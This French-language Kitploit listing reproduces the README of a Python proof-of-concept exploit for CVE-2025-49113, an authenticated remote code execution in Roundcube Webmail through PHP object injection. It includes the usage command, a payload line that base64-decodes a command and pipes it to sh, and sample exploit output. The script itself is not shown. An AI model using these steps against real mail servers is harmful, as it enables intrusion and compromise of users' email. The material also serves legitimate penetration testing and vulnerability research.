Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49113 — 💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection | Kitploit
Outils/GitHubGitHub/00xcanelo/cve-2025-49113
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection

Voir le dépôt
86il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49113 – Exploit RCE Roundcube Webmail (PoC Python)

CVE ID: CVE-2025-49113
Type d'exploit : Exécution de code à distance (via injection d'objet PHP)
Application : Roundcube Webmail ≤ 1.5.9 et ≤ 1.6.10
Langage de l'exploit : Python
Auteur : 00xCanelo
Statut : Testé et fonctionnel sur des installations Roundcube vulnérables


📌 Description

Cet exploit tire parti d'une vulnérabilité dans la manière dont Roundcube Webmail gère les noms de fichiers d'images téléchargés, qui sont désérialisés en tant qu'objets PHP. En forgeant une charge utile malveillante qui déclenche une chaîne de désérialisation Crypt_GPG_Engine, une exécution de commande à distance peut être réalisée post-authentification.

Ce PoC Python imite la chaîne d'attaque utilisée par l'exploit PHP public, mais avec une logique plus propre, une journalisation optionnelle et une facilité d'utilisation dans les configurations d'outillage offensif.


🚧 Prérequis

  • Version Roundcube vulnérable (≤1.5.9 ou ≤1.6.10)
  • Identifiants utilisateur valides sur Roundcube
  • Environnement Python 3.x
  • pip install requests

🚀 Étapes d'exploitation

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

Exemple :

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 Chaîne vulnérable

La classe PHP Crypt_GPG_Engine permet de définir un champ _gpgconf, qui est ensuite passé à l'exécution du shell.

Notre charge utile construit :

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

dans _gpgconf, ce qui mène à une exécution de code à distance lors de la désérialisation.


💣 Exemple de sortie

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 Structure du fichier

root@kitploit:~
.
├── CVE-2025-49113.py     # Python PoC script
└── README.md             # This documentation

⚠️ Avertissement

Ce code est destiné uniquement à des fins de tests de sécurité éducatifs et autorisés. Toute utilisation abusive de cet outil est strictement interdite. L'auteur n'est pas responsable des dommages causés.


🧠 Références

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
Télécharger l’outil